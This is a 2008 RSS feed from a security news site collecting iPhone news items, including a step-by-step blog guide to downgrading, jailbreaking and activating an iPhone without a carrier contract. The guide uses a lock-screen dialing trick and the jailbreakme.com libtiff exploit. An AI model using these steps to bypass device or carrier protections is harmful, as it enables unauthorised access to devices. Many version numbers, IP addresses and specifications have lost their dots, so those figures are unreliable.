<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Internet security observatory</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
<item><title>iphone-dev team 3G soft unlock coming soon</title><description>2008-11-20 04:17:04 - Hack a Day : The iphone-dev team has officially stated “all that remains is implementation.” They’ve developed all the pieces they need to perform a software unlock for the iPhone 3G, now it’s just a matter of putting them together in user friendly fashion. They’ve managed to run unsigned code on the baseband, developed custom AT tools, and are</description><link>http://www.secuobs.com/revue/news/37261.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/37261.shtml</guid></item>
<item><title>Developer strikes it rich with iPhone game</title><description>2008-11-19 03:38:38 - Hack In The Box : With its glassy touch screen, powerful graphics, crisp sound and tilt feature, the iPhone is more than a smart phone for some users -- it's a portable entertainment system. It's also become a potential gold mine for entrepreneurs who create games for the device. Just ask Steve Demeter, developer of the popular puzzle game "Trism". A former ATM software designer for a large bank, Demeter created "Trism" in his spare time and pitched it to Apple last spring. The company made the game available for download with the July launch of its App Store, an online provider of applications for its iPods and iPhones. Priced at $5, "Trism" earned Demeter $250,000 in profits the first two months. "It's done phenomenal business," said Demeter, 29, who lives in California's San Francisco Bay area. "I'm very honored that so many people would enjoy my game. I get e-mails from 50-year-old ladies who say, 'I don't play games, but I love Trism.' That's the coolest thing."</description><link>http://www.secuobs.com/revue/news/37031.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/37031.shtml</guid></item>
<item><title>Linux on the iPhone</title><description>2008-11-19 03:38:38 - Hack In The Box : Of course, after Apple develops an elegant and perfectly understandable mobile UI, Linux hackers want to tear it down. Bring on the OpenMoko, Android or Ubuntu Mobile for the iPhone. I enjoyed a recent post by PlanetBeing on the Linux on the iPhone blog. It was an attempt to justify why someone would want to spend a tremendous amount of time to bring Linux to the iPhone, when he or she could “just develop on an open platform instead with no such wasted effort.” Good question, dude. PlanetBeing says he doesn’t want to buy other less-polished platforms just for a hack; he likes the iPhone. And the “knowledge that we are gaining/will have gained about the iPhone hardware will be of incredible practical value to the homebrew iPhone community.”</description><link>http://www.secuobs.com/revue/news/37023.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/37023.shtml</guid></item>
<item><title>Reversing Google’s iPhone voice search</title><description>2008-11-19 02:14:22 - Hack a Day : Google recently updated their Google Mobile App with a couple new features. Voice Search automatically starts listening when you raise the phone to your ear. Just say what you’re looking for, and it will poll Google and return the results. The app leverages Google’s voice recognition engine, which they’ve been training with Goog-411. Andy Baio</description><link>http://www.secuobs.com/revue/news/37012.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/37012.shtml</guid></item>
<item><title>Husband blames iPhone for lewd picture in e-mail account</title><description>2008-11-18 22:32:06 - News : A poster on the Apple Support site is reporting that she found a "raunchy picture" on her husband's iPhone, and that the photo had been sent via Yahoo email to another woman. Her husband admitted taking the picture but claims that he never sent it to anyone. And staff experts at his local Apple store backed him up, saying he'd been a victim of an iPhone glitch.</description><link>http://www.secuobs.com/revue/news/36967.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/36967.shtml</guid></item>
<item><title>Google launches iPhone voice search app</title><description>2008-11-18 19:33:33 - Latest from Computerworld : Google on Monday added voice capabilities to its search application for the iPhone, allowing iPhone owners to speak search terms into the device to perform searches.</description><link>http://www.secuobs.com/revue/news/36926.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/36926.shtml</guid></item>
<item><title>The iPhone sends photos all by itself</title><description>2008-11-18 19:32:19 - SCTeam : Apple's iPhone apparently has a surprising flaw. It reportedly takes photos of your genitals and inserts them into an email all by itself, like a big boy. Susan was kind enough to reveal this flaw on the Apple forums. She says that while rummaging through her husband's phone, as any good wife does, she discovered a photo of his family jewels attached to an email sent to another woman. She naturally accused the cad of cheating on her. The fanboy's excuse was that he did take the photo but never sent it to anyone. He was so worried that his iPhone was deciding to send emails without permission that he reportedly went to the aptly named Apple Genius Bar forum. He swears that an Apple spokesperson assured him it was a known iPhone defect. Sometimes photos attach themselves to an email, even if the email is not sent. Susan tried to find out whether this was actually possible, the future of their marriage depending on it. On the forum, Apple fanboys assure her that he is cheating on her. The iPhone is perfect and has no problems. Anyone who says otherwise is obviously a big liar. Their advice is to leave him, and one of them would like to see the photo. Source: theinquirerfr</description><link>http://www.secuobs.com/revue/news/36920.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/36920.shtml</guid></item>
<item><title>Free iPhonew00t</title><description>2008-11-18 15:40:24 - MNIN Security Blog : Well, not really, but that's how I justify it. As an existing Cingular/ATT customer with a Samsung Blackjack, I've been paying $60/month for unlimited data and unlimited text messages. The iPhone plan with unlimited data and 1500 texts is only $30/month. Based on the assumption that there will never be a month when I send more than 50 texts per day on average, I'll end up saving $30/month if I buy an iPhone and drop the $60 plan. The $430 8GB purchase will practically pay for itself within the first 14 months. Thanks for overcharging me for so long, Cingular. Update: This is the biggest piece of shit phone I've ever seen. For a 10% restocking fee, I'm more than glad to return it first thing tomorrow morning. It doesn't support MMS. What the fuck kind of multimedia phone doesn't support MMS? It doesn't take videos and the camera is so lame, it doesn't have a single feature besides "take picture". Three of the four times I tried to sync music, it hung and ejected itself from iTunes. And devices with non-removable batteries that drain quick are just no use to people who don't stand next to power outlets all day.</description><link>http://www.secuobs.com/revue/news/36824.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/36824.shtml</guid></item>
<item><title>XMCO: A flaw discovered in iPhone applications developed with the SDK</title><description>2008-11-18 13:22:14 - Global Security Mag Online : Intrepid iPhone developers bypass security for functionality. Date: 18 November 2008. Platform: Mac OS X. Program: iPhone. Exploitation: with a malicious file. Impact: system access. Description: A new problem affecting applications developed for the iPhone has just been disclosed. For several months, Apple has allowed developers to create their own applications and then sell them through the AppleStore portal. Any Internet user can therefore  - Vulnerabilities</description><link>http://www.secuobs.com/revue/news/36778.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/36778.shtml</guid></item>
<item><title>The next iPhone 3G update is causing fear</title><description>2008-11-18 08:16:53 - ZATAZ News : iPhone 3G unlocking enthusiasts are worried about the next update to Apple's mobile phone.</description><link>http://www.secuobs.com/revue/news/36727.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/36727.shtml</guid></item>
<item><title>The new iPhone update worries tinkerers</title><description>2008-11-17 19:34:39 - SCTeam : iPhone enthusiasts know the adventures of the tinkerers at the iPhone Dev Team (iDT). The mission of these merry pranksters of the bit: find every workaround to unlock, SIM-unlock, Apple's mobile phone. However, it seems the big apple is going to put in place the means to root the iDT worm out of its iPhone. The iPhone 3G update, V 22, has been announced by the iDT and it worries the tinkerers. “This update will be released soon,” says the Dev Team. “Do not install it blindly, or else do not come complaining afterwards.” Since the release of the iPhone 3G, the Dev Team has been talking about the upcoming introduction of a SIM-unlock method for the iPhone 3G. And Apple fully intends to counter this hazy idea. Last July the Dev Team released software named Pwnage Tool 201 that makes it possible to install a slightly modified update in order to “jailbreak” the device. A modification to install and run any program, signed or not, by Apple. Source: theinquirerfr</description><link>http://www.secuobs.com/revue/news/36513.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/36513.shtml</guid></item>
<item><title>iUnlock-iPhonecom releases latest iPhone 3G unlock scam</title><description>2008-11-17 02:32:30 - Hack In The Box : Ripoff merchants iUnlock-iPhone have put out a press release celebrating “groundbreaking 3G capabilities” and raising hopes of a true iPhone 3G unlock, but a quick perusal of its press release and website shows it’s all just a scam to pilfer US $2495 out of your pocket and steer you away from the iPhone Dev Team’s free software. In this release, dated the 13th of November, iUnlock-iPhone trumpets that it has made “groundbreaking developments in its iPhone unlocking software, which will allow owners of 3G iPhones to enjoy similar freedoms as those with older models.” Now, you might think that this means a true iPhone 3G unlock has been found, trumping the hardworking hackers over at the iPhone Dev Team with a world first. But no, instead we find creative claims that could otherwise be known as lies - depending on your point of view.</description><link>http://www.secuobs.com/revue/news/36386.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/36386.shtml</guid></item>
<item><title>Intrepid iPhone developers bypass security for functionality</title><description>2008-11-15 14:54:22 - McAfee Avert Labs : The Apple iPhone is vulnerable to a new bug related to the signing of iPhone applications. Applications that are created with the official iPhone SDK need to be cryptographically signed by the author and Apple before they’re allowed into the App store or installed on an iPhone. The digital signing is a security measure that</description><link>http://www.secuobs.com/revue/news/36180.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/36180.shtml</guid></item>
<item><title>Controlling a PC from an iPhone</title><description>2008-11-15 13:02:37 - Toutes les actualités : The LogMeIn Ignition software lets you control your PC or Mac from a simple iPhone or iPod Touch. The mouse and keyboard are supported.</description><link>http://www.secuobs.com/revue/news/36169.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/36169.shtml</guid></item>
<item><title>Microsoft: Office Web will be available from Mac, Linux, iPhone</title><description>2008-11-13 21:19:57 - Latest from Computerworld : Microsoft's upcoming Office Web -- a lightweight version of its Office suite that runs as an online service -- will be available to Mac OS X and Linux users, as well as to those using Apple's iPhone.</description><link>http://www.secuobs.com/revue/news/35861.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/35861.shtml</guid></item>
<item><title>Analysis: iPhone exploit much ado about nothing</title><description>2008-11-13 19:23:55 - ArsTechnica Security Content : Ars investigates the recent iPhone "Defaultpng" controversy and concludes that there's little to worry about.</description><link>http://www.secuobs.com/revue/news/35850.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/35850.shtml</guid></item>
<item><title>c|net: Web-based Office to work on Macs, iPhone</title><description>2008-11-13 10:56:59 - Rootsecure.net : c|net: Web-based Office to work on Macs, iPhone</description><link>http://www.secuobs.com/revue/news/35733.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/35733.shtml</guid></item>
<item><title>iPhone Firmware 22 coming November 21</title><description>2008-11-13 02:30:23 - Hack In The Box : According to the consistently reliable iPhone Hellas, the iPhone OS 22 update will appear even sooner than we all expected. Barring any sudden plan changes, the iPhone Hellas people are saying the upgrade will be available on November 21. The new feature list remains unchanged from the previous beta versions, so the question here is: Would they add copy and paste by surprise? Like always, the jury is still out on any last-minute surprises. Since there were a few major additions to iPhone OS 22 beta 2 that weren't in beta 1 - like the walking directions, public transit route information, the application scoring, and the direct podcast downloading over the air - we may find more things in a third beta. However, with just 10 days until the 21, this seems unlikely unless there are small changes.</description><link>http://www.secuobs.com/revue/news/35682.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/35682.shtml</guid></item>
<item><title>Heise Security: iPhone to add wireless modem feature</title><description>2008-11-12 09:09:09 - Rootsecure.net : Heise Security: iPhone to add wireless modem feature</description><link>http://www.secuobs.com/revue/news/35430.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/35430.shtml</guid></item>
<item><title>iPhone Hacker Ports Debian Linux OS To T-Mobile G1</title><description>2008-11-11 22:30:10 - Packet Storm Security Headlines : </description><link>http://www.secuobs.com/revue/news/35331.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/35331.shtml</guid></item>
<item><title>iPhone overtakes RAZR as top selling handset</title><description>2008-11-11 15:16:42 - Latest from Computerworld : Apple's iPhone surpassed the Motorola RAZR as the leading handset purchased by US-based adults in the third-quarter, according to a new study by market research firm The NPD Group.</description><link>http://www.secuobs.com/revue/news/35232.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/35232.shtml</guid></item>
<item><title>Ants and iPhones may help in reducing traffic jams</title><description>2008-11-11 03:33:53 - Hack In The Box : Surely one of the most irritating ways to waste energy and time is sitting in heavy traffic with the engine idling. Is there any technology on the horizon to eliminate or mitigate traffic jams? Ants and iPhones may lead the way. Research by collective intelligence expert Dr Dirk Helbing of the Dresden University of Technology in Germany indicates that ants and their rough-and-ready methods of communication may be ahead of us in smoothening traffic congestion by communication and feedback of optimal routes. “Dr Helbing’s team set up an "ant motorway" with two routes of different widths from the nest to some sugar syrup. Soon the narrower route became congested. But when an ant returning along the congested route to the nest collided with another ant just starting out, the returning ant pushed the newcomer onto the other path.</description><link>http://www.secuobs.com/revue/news/35156.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/35156.shtml</guid></item>
<item><title>iPhone to add wireless modem feature</title><description>2008-11-11 03:33:53 - Hack In The Box : Apple's 3G iPhone will soon gain a feature that it currently lacks compared to most other 3G smartphones - the ability to act as a modem for the computer it's attached to. At the Web 20 summit in San Francisco, AT&amp;T CEO Ralph de la Vega said that a firmware update would soon be available to allow "tethering" - in other words, for the phone to make its data connection available to a PC or Mac. Generally, notebook owners use this for getting a fast data connection when out of reach of Wi-Fi. Although this is possible with many 3G phones, such as Nokia's E-series devices, Apple has up to now blocked this feature. Third-party applications are out there to achieve this, but Apple blocks their distribution. For iPhone owners who have "jail-broken" their device, so that unsigned programs can be installed, there is iSoft's iModem. Jailbreaking is quite straightforward, but Apple's software updates often reverse the process, rendering apps useless until the hackers find a way around the latest restrictions.</description><link>http://www.secuobs.com/revue/news/35153.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/35153.shtml</guid></item>
<item><title>Metasploit on the iPhone</title><description>2008-11-09 15:17:38 - nzight : A nice write-up on the iPhone has been posted in Metasploit's blog. My favorite point: Every process runs as root. MobileSafari, MobileMail, even the Calculator, all run with full root privileges. Any security flaw in any iPhone application can lead to a complete system compromise. A rootkit takes on a whole new meaning when the attacker has access to the camera, microphone, contact list, and phone hardware. Couple this with "always-on" internet access over EDGE and you have a perfect spying device.</description><link>http://www.secuobs.com/revue/news/34556.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34556.shtml</guid></item>
<item><title>More iPhone hacking by HD Moore</title><description>2008-11-09 15:17:38 - nzight : He's written more on hacking the iPhone on Metasploit's blog. Definitely worth a read. I'm dying to read part two.</description><link>http://www.secuobs.com/revue/news/34555.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34555.shtml</guid></item>
<item><title>Activating/Jailbreaking/Unlocking the iPhone 112 OTB - State-of-the-Art</title><description>2008-11-09 14:20:48 - RaDaJo (RAul, DAvid and JOrge) Security Blog : Disclaimer: Use of any information available on this and future related posts is at your own risk, you are 100% responsible for what you do or don't do with it, including any Apple's copyright violation or infringement. For an applicable detailed disclaimer about iPhone hacking, please check this. All the information published in this series of posts has been provided by my friend Esteban J, also known as Steve J.

This series of posts is about how to activate the iPhone version 112 OTB (Out of The Box) without requiring a 2-year AT&amp;T service agreement. It also provides an update of the current iPhone hacking scene on January 1st, 2008, plus a detailed step-by-step guide to complete the iPhone activation and jailbreak process.

My friend Esteban got an iPhone recently, and because he lives outside the US, he cannot or doesn't want to use the associated AT&amp;T service and rate plans. By default, if you do not activate an AT&amp;T account, the iPhone is just a brick, or iBrick :) The first step required after unpacking the device is to connect it to your laptop, and follow the Apple/AT&amp;T iPhone activation process using iTunes. If you do not provide your contact details (including credit card info), and get or migrate to an AT&amp;T contract, you cannot activate the iPhone and access any of its functionality.

The iPhone is a pretty impressive small device running OS X. Basically, it's like an iPod Touch (iPod + WiFi) with GSM/EDGE + Bluetooth 20 capabilities, plus a 20 megapixels camera; an all-in-one device, where the main drawbacks are the lack of a built-in GPS and 3G support (a very common technology in mobile networks all over Europe). Apart from the technical specs, the main differentiator is the user interface, the "Touch" :)

This and future related posts try to provide a simplified guide to hack the last version of the iPhone, and try to summarize and clarify the huge amount of information available out there related with the topic, specially given the differences between the various iPhone versions, mainly 102, 111 and 112. It's not cutting-edge information, as there are tons of iPhone hacking resources, such as the Hackint0sh Forums, iPhone unlock, hackthatphone, iphone-hacks, modmyifone or winandmaccom. It just pretends to be an easy to follow guide, informative update, all seasoned with some home-made technical security research. What makes iPhone hacking pretty interesting, is that the main hack is just based on executing code inside the device after exploiting a well-known vulnerability in one of its components, the Safari web browser.

My friend's end goal is to be able to activate a US iPhone in Europe, including all its capabilities. At the end of December, this is the iPhone hacking state-of-the-art:
* The current and latest iPhone version (factory, or OTB) is 112
* The associated modem firmware version is 040213_G
* If the device serial number starts with XX745 or above, it means it has been released on week 45 or above, and the bootloader version is 46

This device (commonly referred as 112 OTB) is the one currently available on stores and presents strong hacking limitations at this point in time. The end-result of this guide will be an unlocked or free iPhone, without phone capabilities, that is, something like an iPod Touch, plus Bluetooth and camera. The reason is that the current bootloader has not been hacked through software yet (although several smart people are actively working on it). The previous bootloader version, 39, was hacked and allows you to take advantage of the phone capabilities using a SIM from any telecom mobile operator. Unfortunately, the hack doesn't work yet with the 46 bootloader.

At this point, the only option to get a fully working 112 OTB iPhone is to follow this or a similar guide, plus getting a hardware-based hacking SIM, such as TurboSIM (around $40). Although there are (or were) multiple iPhone activation methods without an AT&amp;T account, the one presented in this guide or series of posts is the easier one and it works with the current iPhone version.

Before starting with the detailed process, let's clarify a few terms:
* Downgrade is the process that involves going from a major firmware version to a minor version, such as from the current default 112 version to 111. Upgrade is just the opposite
* Activation is the process required to enable the iPhone, in this guide, bypassing the standard AT&amp;T activation to get access to almost all the functions in the iPhone
* Jailbreak is the process that provides you the ability to install third party applications on the iPhone
* Unlock is typically used to refer to the process required to unlock or free the iPhone's SIM module, so that the iPhone can be used with any SIM card instead of the AT&amp;T default SIM

At this point, you are ready to jump to the first step of the step-by-step guide to activate and jailbreak an iPhone's 112 OTB.

On a personal note, and not being a lawyer, Apple is clearly fighting hard to keep its exclusiveness and prestige, although I think that once you pay for the device in an Apple Store, the device belongs to you, that is, you're the owner so, you can play with it.

Some Apple iPhone facts:
* It seems that about a month ago, Apple limited the number of units that can be acquired in the US per person, from 5 to 2
* Esteban couldn't pay the iPhone by cash. He needed to use a credit card so that Apple can track the number of units he buys (see previous bullet)
* Recently (end of 2007) the iPhone has officially reached some European countries, like UK, Germany or France
* Esteban didn't sign up any contract when he bought the iPhone, although he religiously paid its price in an Apple Retail Store
* Esteban was not notified during the buying process about all the details of the iPhone and AT&amp;T service agreement, and the constraints not only for the phone capabilities, but for the device as a whole
* Esteban was allowed to buy the iPhone although he does not live in the US, as his credit card and passport reflected during the payment process
* Finally, iPhone version 113 is going to be released soon, and as usual, it seems it will affect the current activation, jailbreaking and unlocking hacks

It seems we do not learn from the past. The best offer is that combining a great product and a brilliant commercial strategy. Demanding customers today ask for flexible, open, customizable, and "hackable" products, and if you do not believe me, ask Microsoft or Linksys/Cisco. In my modest opinion, if Apple wants to attract a population other than Apple's staunch admirers, they should reconsider the iPhone go-to-market strategy. On the other hand, if they want to avoid this type of hacks, they could simply not sell the device without an associated service contract, as it is the case in Europe for several cell phones (unless you pay more for the device).
--
¡Happy New Year 2008 to all our readers!</description><link>http://www.secuobs.com/revue/news/34472.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34472.shtml</guid></item>
<item><title>Guide to activate and jailbreak the iPhone 112 OTB on Windows - Prerequisites 1/4</title><description>2008-11-09 14:20:48 - RaDaJo (RAul, DAvid and JOrge) Security Blog : The initial preparation step (STEP 1) in order to get a free and usable iPhone 112 OTB (Out of The Box) requires to obtain all the software needed to activate and jailbreak the iPhone. This guide is based on the following components and versions:
* Computer OS: Windows XP SP2
* iTunes v75020
* iPhone firmware version 112 OTB - Serial number: XXX47 (bootloader v46)
* iPhone modem firmware version: 040213_G (aka baseband)

The iPhone firmware version can be easily determined by looking at the default, unactivated, iPhone screen. If it shows a globe (left image), it is version 111 or lower; if it shows a music CD and cable (right image), it is version 112.
Images obtained from wwwhackthatphonecom

How to check the iPhone modem firmware version:
1- Turn on your iPhone.
2- The default screen shows the "slide for emergency" button at the bottom.
3- Slide and you will get the "Emergency Call" screen plus the phone keypad.
4- Type the *3001#12345#* number and press the "Call" button.
5- You will get the "Field Test" window.
6- Select the "Versions" menu option.
7- You will get information about your firmware (find the typo :)), such as:
Firware version: 040213_G
LCD Panel ID:

This output corresponds to version 112. The previous iPhone version, 111, shows 040113_G (01 instead of 02) as the modem firmware version. A complete list of iPhone versions and the corresponding modem firmware versions is available here.

Once the details of the required elements have been verified, you need to download three files:
* iPhone v111 firmware image (iPhone1,1_111_3A109a_Restoreipsw) from Apple or mirrors
* iBrickr v091 (ibrickr_v091zip) from natetrue
* Jailbreak v112 (112-jailbreakzip) from Conceited Software

After downloading these files, verify their integrity using any MD5 tool, like md5deep:
C:md5deep iPhone1,1_111_3A109a_Restoreipsw
d6508e86d588a76547b9cae52d38e325  C:iPhone1,1_111_3A109a_Restoreipsw
C:md5deep ibrickr_v091zip
cff8165f71f74af3f5ad75250fd21d31  C:ibrickr_v091zip
C:md5deep 112-jailbreakzip
eaef139f3a14ee9aabc7dc445741ca31  C:112-jailbreakzip

At this point, you are ready to jump to STEP 2 and downgrade the iPhone's firmware version from 112 to 111.</description><link>http://www.secuobs.com/revue/news/34471.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34471.shtml</guid></item>
<item><title>Guide to activate and jailbreak the iPhone 112 OTB on Windows - Downgrade 2/4</title><description>2008-11-09 14:20:48 - RaDaJo (RAul, DAvid and JOrge) Security Blog : This next step (STEP 2) requires to downgrade the iPhone from version 112 to 111. Why do we need to follow this process? Because in STEP 3, we will take advantage of a vulnerability in the 111 version of the iPhone and run code inside the device.

From now onward, I'll start adding some security-related comments for the infosec readers, marked with *.

NOTE: Internet connectivity is required on the computer running iTunes in order to start the activation process.

1- Connect your iPhone via USB to your computer. iTunes starts, connects to the Internet, and displays the default activation screen (the one this guide tries to bypass).
All iTunes screenshots are based on the Spanish version, the one used by Esteban.

* During the activation process, iTunes resolves "phobosapplecom" and establishes an HTTP session asking for "/bagxmlix=2". It is redirected to "http://axphobosapplecomedgesuitenet", and asks for "WebObjects/MZStorewoa/wa/initiateSessionix=2" and multiple related resources. It is amazing to see the amount of Apple proprietary HTTP headers used in the exchanges. BTW, the iTunes 75 HTTP User-Agent on Windows is:
User-Agent: iTunes/75 Windows; U; Microsoft Windows XP Professional Service Pack 2 Build 2600 DPI/96
Finally, iTunes resolves and establishes an HTTPS connection against "albertapplecom", the real activation server; it also uses HTTP against the same server to retrieve multiple images. *

2- Click the Home button (the main and only button on the screen) and the Sleep/Wake button (on the top right corner of the device) on the iPhone simultaneously and keep pressing them until iTunes detects and shows a message to indicate that the iPhone is in recovery mode. You need to press both buttons around 10-30 seconds.
The iPhone restarts during the process, it gets disconnected from Windows (you can hear the typical Windows USB disconnect device sound) and is reconnected back again.

3- Dismiss the warning message in iTunes by pressing the "OK" button. You are presented with two options: "Check for Update" and "Restore". Press the Shift key in Windows and then click on the "Recover" button in iTunes. The Shift key is required because if it is not used, then the restore operation will restore the iPhone to the default factory setting and the latest firmware version (112), instead of allowing you to select a new firmware file.
A window to browse for files will open. Select the iPhone 111 firmware file (you should have downloaded on STEP 1) and press the "Open" button. iTunes will downgrade your iPhone, a process that takes around 5 minutes. The downgrade process will end up with a 1013 or 1015 error message (see image).

4- Press the "OK" button to confirm the error message. You are returned back to the restore warning message. Press the "OK" button to confirm this message too.

5- In order to get out of the "after the downgrade/restore" state, you need the iBrickr tool for Windows you downloaded on STEP 1. Uncompress the ZIP file and run the tool (ibrickrexe).

6- Choose the "Boot the phone" option to reboot the iPhone and get out of the recovery mode.
During the process the iPhone background turns red, that's the good color here :), as explained in the iBrick "Attempting to fix" window.

Once the iPhone has restarted, it will run iPhone firmware version 111 and you will get the old "Activate iPhone" screen on the iPhone, that is, a globe image. iTunes will show the AT&amp;T activation screen again, and you can close the iBrickr tool.

At this point, you have downgraded the iPhone from version 112 to 111, and you are ready to jump to STEP 3 in order to jailbreak the device.</description><link>http://www.secuobs.com/revue/news/34470.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34470.shtml</guid></item>
<item><title>Guide to activate and jailbreak the iPhone 1.1.2 OTB on Windows - Jailbreak and Activate 3/4</title><description>2008-11-09 14:20:48 - RaDaJo (RAul, DAvid and JOrge) Security Blog : In STEP 3 the goal is to jailbreak the iPhone, that is, take control of the device in order to be able to activate it and run third-party applications. We are going to use Safari on an unactivated iPhone, and browse to a specific Web site that is going to exploit a vulnerability in the device and execute the code required to "free" the device.
Prerequisites:
* Wireless (802.11b/g) Internet connectivity is required for the iPhone in order to activate and perform an initial jailbreak on the device.
* iTunes is not required in this step. You can leave the iPhone plugged in to the USB port and iTunes running.
* The default AT&amp;T SIM card provided with the iPhone must be inserted in the phone.
1- Go to the iPhone activation screen that shows "slide for emergency" at the bottom and slide to get the "Emergency Call" window plus the phone keypad. Dial *#307# and press the "Call" button.
2- The iPhone will start ringing. While it rings, erase *#307# by using the back button on the top of your iPhone screen. Type 0 and press the "Call" button. The iPhone will start ringing again. This time you must press "Answer" (green button) and then press the "Hold" button. The iPhone will start ringing again. This last time press "Decline" (red button). You now get access to the menu showing options for the favorites, contacts, etc.
You need to perform the next step "quickly", so as not to get locked out of the screen, as the default iPhone lockout timeout is one minute. If you are idle for more than one minute and get locked out, follow this quick sequence of steps:
* Thereafter, every time you want to get to the same screen, you need to push the iPhone Home button, just slide the "slide for emergency" button, then press 0, press Call, press Answer, press Hold, and press Decline.
3- From the keypad screen, select "Contacts" and add a new contact through the + symbol:
* Then select "First Last", add "Testing" as the contact name, and select Save.
* Select "Add URL", type "prefs://1F", and select Save.
* Select "Add URL" again, type "http://jailbreakme.com", and select Save.
When this is done, select "Save" again to store the new contact and the iPhone will take you to the contact "Info" page, displaying the name "Testing" and the two URLs you just added.
4- Select the "prefs://1F" URL and it will open the iPhone "Settings" page. Select "General" and the "Auto-Lock" option. Set the value to "Never", so that the iPhone screen doesn't get locked during the next steps if you spend more than one minute reading this guide :)
5- Go back to the "Settings" screen. From there, select "WiFi" and add or choose your wireless network and make sure you are connected to it (you shouldn't get a connection error message).
6- Now, hit the Home button on the iPhone to go back to the activation screen, slide and dial the number 0. The iPhone will now ring again; press Answer, press Hold, and press Decline, just like before.
7- Now, select "Contacts" again and then the "Testing" contact added previously; this time go to the "jailbreakme.com" URL (the second one). At the time of the testing, the domain is associated to IP addresses 9112118102 and 2087587234. Safari will open and load the page. When the page loads, scroll down and click on "Install AppSnapp". Safari will now close and the iPhone returns to the activation screen. It takes about one minute for the application to get installed. Be patient. At this point, the iPhone will restart. Once you get to the activation screen again, slide to access the dial keypad. When you do this, the iPhone will restart again. Once the iPhone comes back, you can slide to get access to all the iPhone functions/icons for the first time. At this point you are activated and jailbroken.
* Remember that in STEP 2 we downgraded the iPhone to version 1.1.1. The "jailbreakme.com" Web site takes advantage of a vulnerability in the version of the libtiff library contained on iPhone version 1.1.1, through the MobileSafari browser. By exploiting this vulnerability it is capable of running code inside the device (see CVE-2006-3459 and the original exploit, plus source code).
The exploit inside the "/files/y.tiff" file at "jailbreakme.com" opens the iPhone for full disk access and installs the AppSnapp Installer for iPhone 1.1.1, called Installer.app, by Nullriver Software. At the time of this writing it installs version 3.0b4. In fact, the TIFF file opens the door for other files from "/files" that are downloaded to the iPhone to perform the hack, such as "payload2.bin", "root.zip", or "youtube.zip". You can even build your own "jailbreakme" server (forums). *
The AppSnapp Installer is a software package management tool that allows you to add/install any third-party application into the iPhone. It includes an "Installer" icon on the main iPhone screen for easy access to the software community repositories. Additionally, during the hack process the TIFF image-rendering library vulnerability is fixed (you're now more secure :) ), and YouTube is fixed too.
BTW, this jailbreaking process also works on the iPod Touch. When writing this portion of the guide I found a video covering exactly this step. The specific set of actions is slightly different but gives you an idea of what it should look like.
Some of the alleged reasons argued by Apple not to allow third-party applications are the potential loss of quality and instability on the device, as well as the security risk of getting malware. I agree that "untrusted" and external code can cause these issues, but users demand flexibility at the cost of it. Anyway, this is changing with the currently available WebApps and resources for developers, plus the upcoming native application development kits (Feb'08).
At this point, you have jailbroken and activated the iPhone, version 1.1.1, and you are ready to jump to the last step, STEP 4, in order to upgrade to version 1.1.2 and re-activate the iPhone.</description><link>http://www.secuobs.com/revue/news/34469.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34469.shtml</guid></item>
<item><title>Guide to activate and jailbreak the iPhone 1.1.2 OTB on Windows - Upgrade and Re-Activate 4/4</title><description>2008-11-09 14:20:48 - RaDaJo (RAul, DAvid and JOrge) Security Blog : The last step, STEP 4, is focused on upgrading the iPhone to version 1.1.2, and re-activating and jailbreaking the device again on the new version.
Once the iPhone restarts from the 1.1.1 jailbreak in the previous step, STEP 3, by default it will reconnect to the previously selected wireless network if it is still available. This connection is required to access the software repositories and install new tools.
1- Click on the "Installer" icon on the iPhone (the last blue icon on the main iPhone screen, aka the Springboard). The "Welcome Installer 3" screen will show up.
2- iTunes is required to upgrade the iPhone, so the iPhone must still be connected to the USB port. During the whole process iTunes can be running on your computer. At this point, iTunes will detect a new activated iPhone and will ask you for the device name, sync information, etc. Select a name for the iPhone and uncheck the auto synchronization checkbox. Click on "Exit".
3- Select the name of the iPhone in the left column of iTunes. iTunes will show the default screen, including the "Check for Update" and "Restore" buttons.
4- On the iPhone select the "Installer" icon. The AppSnapp tool will connect to the Internet and access and refresh the current software source repositories.
NOTE: If you access the "Installer" and it asks you to update itself, please do so. The current version at the time of this writing is 3.0b8.
5- Select the Install icon (+ symbol) and go to the "Tweaks (1.1.1)" category. Select "OktoPrep" and click the "Install" button on the top-right corner of the iPhone.
NOTE: There are current reports (Feb'08) that OktoPrep is not available anymore. See comments below from other readers.
* This step installs OktoPrep 1.0, a tool that prepares 1.1.1 iPhones for the TouchFree jailbreak. It runs the steps (it modifies files unaltered by the 1.1.2 firmware) required to be able to run the Windows-based TouchFree jailbreaking tool after upgrading the iPhone to version 1.1.2. Therefore, OktoPrep must be installed and run on iPhone 1.1.1, and TouchFree (aka Jailbreak) must be run on Windows after upgrading the iPhone to version 1.1.2.
